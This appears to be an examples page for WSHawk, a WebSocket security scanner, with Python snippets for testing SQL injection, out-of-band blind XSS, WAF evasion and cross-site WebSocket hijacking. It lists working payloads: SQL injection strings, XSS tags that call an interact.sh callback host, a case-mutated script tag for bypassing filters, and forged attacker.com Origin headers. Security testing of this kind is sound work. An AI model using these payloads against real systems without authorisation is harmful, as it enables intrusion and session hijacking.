WSHawk | Professional WebSocket Security Scanner

Name: WSHawk
Author: Regaan

SQL Injection in JSON Payload

Injection

Detecting blind SQL injection in a complex nested JSON WebSocket message.

1import asyncio
2from wshawk.scanner_v2 import WSHawkV2
3 
4async def test_sql_injection():
5    # Initialize scanner
6    scanner = WSHawkV2("ws://api.target.com/v1/chat")
7    
8    # Message to inject into
9    sample_msg = {
10        "action": "search",
11        "params": {
12            "query": "laptop",
13            "filter": "available"
14        }
15    }
16    
17    # Run targeted injection
18    results = await scanner.message_analyzer.inject_and_test(
19        await scanner.connect(),
20        sample_msg,
21        injection_type="sql"
22    )
23    
24    # WSHawk automatically mutates 'query' field with:
25    # ' OR 1=1--
26    # " OR "1"="1
27    # ') OR ('1'='1
28    # sleep(5)--

OAST-Based Blind XSS Detection

XSS

Using interact.sh to detect out-of-band XSS execution in backend admin panels.

1# Enable OAST in scanner
2scanner = WSHawkV2(url)
3scanner.use_oast = True
4 
5# WSHawk generates payloads like:
6# <script src="https://c72...j9.interact.sh"></script>
7# <img src=x onerror="fetch('https://c72...j9.interact.sh')">
8 
9# The scanner polls the OAST provider for interactions
10await scanner.run_heuristic_scan()
11 
12# If an admin views your message, WSHawk catches the callback:
13# [SUCCESS] OAST Interaction detected!
14# Source IP: 45.x.x.x
15# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...

Adaptive WAF Evasion

Evasion

Automatically learning from WAF responses to find bypass strategies.

1# Mutation engine uses feedback loop
2from wshawk.payload_mutator import PayloadMutator, MutationStrategy
3 
4mutator = PayloadMutator()
5 
6# Initial payload gets blocked (403 Forbidden)
7mutator.learn_from_response(
8    payload="<script>alert(1)</script>",
9    is_blocked=True
10)
11 
12# Mutator recommends alternate strategy: CASE_VARIATION + COMMENT_INJECTION
13strategy = mutator.get_recommended_strategy()
14payloads = mutator.mutate_payload(
15    "<script>alert(1)</script>", 
16    strategy, 
17    count=1
18)
19 
20# Output: <sCrIpT /*--*/>alert(1)</sCrIpT>

Cross-Site WebSocket Hijacking (CSWSH)

Auth

Testing for missing Origin validation using headless browser simulation.

1# Test for Origin bypass
2results = await scanner.test_origin_bypass()
3 
4# WSHawk attempts connection with:
5# Origin: http://attacker.com
6# Origin: null
7# Origin: http://target.com.attacker.com
8 
9if results['vulnerable']:
10    print(f"CSWSH Detected! Accepted Origin: {results['origin']}")